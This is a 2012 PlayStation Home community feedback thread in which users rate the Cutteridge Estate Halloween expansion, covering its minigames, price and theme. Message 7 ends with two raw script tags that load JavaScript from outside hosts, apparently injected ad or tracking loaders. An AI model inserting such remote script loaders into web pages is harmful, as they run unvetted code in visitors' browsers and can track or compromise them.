Oct 25 2012
By: GlassWalls PlayStation Community Manager (Retired) 2875 posts

[POLL Feedback Thread] Cutteridge Estate: Cutteridge Ghost Stories

12 replies 587 views Edited Oct 25, 2012

Here's the official comment thread for the Cutteridge Estate: Cutteridge Ghost Stories expansion poll. If you're familiar with the content and voted in the official poll, we welcome your additional feedback.

*First, please go vote in the official Poll in Home General at the top right if you are familiar with the content, then leave your comments here. 

Thanks! :smileyhappy:

Message 1 of 13 (587 Views)
VP of Gaming
28396 posts

Re: [POLL Feedback Thread] Cutteridge Estate: Cutteridge Ghost Stories

[ Edited ]
Oct 25, 2012

Very satisfied. 

I've always wanted a truly scary place in Home and this is it. And being a big fan of H. P. Lovecraft, I can appreciate the "nod" to his writings. In fact, I have a photograph of him hanging on one of the walls of my Cutteridge Estate.

Hopefully this personal space will never turn "cute" or "friendly".

In one of the tours I gave of Zombie Deadquarters a few years ago, someone said that the space "freaks me out" and that he couldn't buy it because of that. I thought it was a very good review of that space. If we had the "Freaked Out" option here, I would have picked it. 

The way you play the game is the way you live your life.

Message 2 of 13 (572 Views)
0 Likes
I Only Post Everything
1207 posts

Oct 25, 2012

Very satisfied. Love the updates to the space and the new clubhouse version for only $4. Hopefully next Halloween something else just as cool will be added to the space.

Message 3 of 13 (549 Views)
0 Likes
Uncharted Territory
1187 posts

Oct 25, 2012

Satisfied. The expansion to the Cutteridge Estate itself is quite entertaining, although the ultimate prize (which, to be fair, isn't even used as a selling point) feels somewhat anticlimactic. Lovecraft fans, though, as Conrad mentioned, may have a more positive outlook.

Full opinion on the matter here.

NorseGamer

Editor-in-Chief, HSM

www.hsmagazine.net

Message 4 of 13 (536 Views)
0 Likes
Lombax Warrior
71 posts

Oct 25, 2012

I voted satisfied.

I love the feel of the space, the new games which are actually entertaining and the theme.. I love the new design of the space as well. This space is close to perfection. The Demonic version of the space is amazing as well! The only reason though that I did not vote "very satisfied" was for the fact that friends without the expansion couldn't play the games. It saddens me that they can't experience the joys I had with it. Even if they could play the games, but not get the rewards or the full rewards at least, it'd still be fine. Plus, the lack of the Ghost game is real bad timing. I wanted to help others by having them have a good time playing and getting a costume for Halloween. Other than those few things, it's great.

Message 5 of 13 (525 Views)
0 Likes
Treasure Hunter
4466 posts

Oct 26, 2012

Very Satisfied! Enjoyed all the new minigames and the rewards were nice too!

Message 6 of 13 (448 Views)
0 Likes
Lombax Warrior
136 posts

Oct 26, 2012

i loved both the games and the new space. it is fun to have a space you can decorate solely for halloween. would love a bit more ghosts in the demonic estate but other then that it's great. i do think if they are taking out the ability to buy the story should make the games in the spaces available for all friends just for the fun of it

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
Message 7 of 13 (430 Views)
0 Likes
Ghost of Sparta
10662 posts

Oct 26, 2012
Very Satisfied. Very much worth the $7, the minigames were great and amount of content it came with was a plus.

Maybe you should consult Juggernaut next year for your next Halloween event, they do it right. Just saying Smiley Wink
New PSN ID for PS4: Redd-Axel

Come check out my Twitch TV channel, will be streaming various PS4 games from time to time http://www.twitch.tv/reddaxel
Message 8 of 13 (407 Views)
Fender Bender
2760 posts

Oct 26, 2012
Very satisfied. I am really happy about the club skin release. The associated active furniture is great.

I second the above comment for next years Halloween event.
Posted Image

Message 9 of 13 (390 Views)
0 Likes
Highlighted
Uncharted Territory
1311 posts

Oct 28, 2012

Even thou they removed the two games temporarily in the Cutter ridge,

The add on pack that cost  over 9 dollars.. With the 4 minigames and around a total of  items and rewards comes to about 15 or 16 items.

Well, if your into items, that are scary and Halloween themed , these active items enhanced the space, along with the rewarded Demonic space.

This was one of the best bundle deals on Home I have seen.

Pricing each item at about 65 cents each.. Fair Price!! Great items!!

I voted satisfied, would have been very satisfied, but replay value of mini games is small.

Great job on the Cutterridge.

Message 10 of 13 (299 Views)